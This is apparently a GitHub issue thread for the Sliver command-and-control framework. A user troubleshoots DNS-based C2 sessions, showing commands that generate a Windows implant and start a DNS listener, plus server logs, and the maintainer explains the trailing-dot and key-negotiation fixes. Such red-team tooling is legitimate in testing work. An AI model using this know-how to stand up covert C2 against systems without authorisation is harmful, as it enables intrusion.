### ISSUE TITLE
C2 Over DNS - 'Is not a subdomain' error

### ISSUE THREAD

**Issue by benweber2** [BishopFox/sliver#156]
**Describe the bug**
When trying to use C2 over DNS - I get the error:

```
INFO[0036] [sliver/server/c2/udp-dns.go:176] '_oki65q.remarkable_original._domainkey.1.REDACTED.pw.' is NOT subdomain of any [1.REDACTED.pw] 

DEBU[0036] [sliver/server/c2/udp-dns.go:156] checking '_oki65q.remarkable_original._domainkey.1.REDACTED.pw.' for DNS canary matches 

INFO[0036] [sliver/server/c2/udp-dns.go:164] Invalid query, no DNS response 
```
The log shows that the query is not a subdomain of the listener, however it is.

**To Reproduce**
1.Generate Sliver:

```
sliver > generate --dns 1.REDACTED.pw --debug --skip-symbols

[*] Generating new windows/amd64 Sliver binary
[*] Build completed in 00:00:06
[*] Sliver binary saved to: /root/REMARKABLE_ORIGINAL.exe


```
2. Start listener:

```
sliver > dns --domains 1.REDACATED.pw

[*] Starting DNS listener with parent domain(s) [1.REDACTED.pw] ...
[*] Successfully started job #1
```

3. Execute payload and review logs

**Expected behavior**
New session to be created.

**Desktop (please complete the following information):**
 - OS: Kali
 - Version 2019.2

**Comment by moloch--** [comment]
Make sure to use the FQDN: `dns --domains 1.REDACATED.pw.` --I've added some logic in the later versions to add the trailing dot automatically, but depending on what version you're on that may not be there.

**Comment by benweber2** [comment]
Thanks Moloch.  This solved one issue, but the session still doesn't open:
Starting the listener:

```
sliver > dns --domains 1.REDACTED.com.

[*] Starting DNS listener with parent domain(s) [1.REDACTED.com.] ...
[*] Successfully started job #1
```


```
INFO[0032] [sliver/server/c2/udp-dns.go:172] '_zrn0xe.beautiful_dragon._domainkey.1.REDACTED.com.' is subdomain of '1.REDACTED.com.' 
DEBU[0032] [sliver/server/c2/udp-dns.go:153] '_zrn0xe.beautiful_dragon._domainkey.1.REDACTED.com.' is subdomain of c2 parent '1.REDACTED.com.' 
INFO[0032] [sliver/server/c2/udp-dns.go:186] processing req for subdomain = _zrn0xe.beautiful_dragon._domainkey 
INFO[0032] [sliver/server/c2/udp-dns.go:164] Invalid query, no DNS response 

```

For reference, I am on v0.0.6:

```
root@kali:~# ./sliver-server --version
Client v0.0.6 - 23cc4206acd841b030ef62d1e80d6839478dfb6a
Server v0.0.6

```

Thank you for the help!

**Comment by moloch--** [comment]
Let it sit for about a minute or two, there's a little instability in the initial key negotiation that occurs with the "_domainkey" request. It's on my list to improve this process and make it more stable!

**Comment by benweber2** [comment]
Thank you for the help @moloch-- That fixed the issue.  I was running the payloads in a sandbox which closes after 120 seconds.
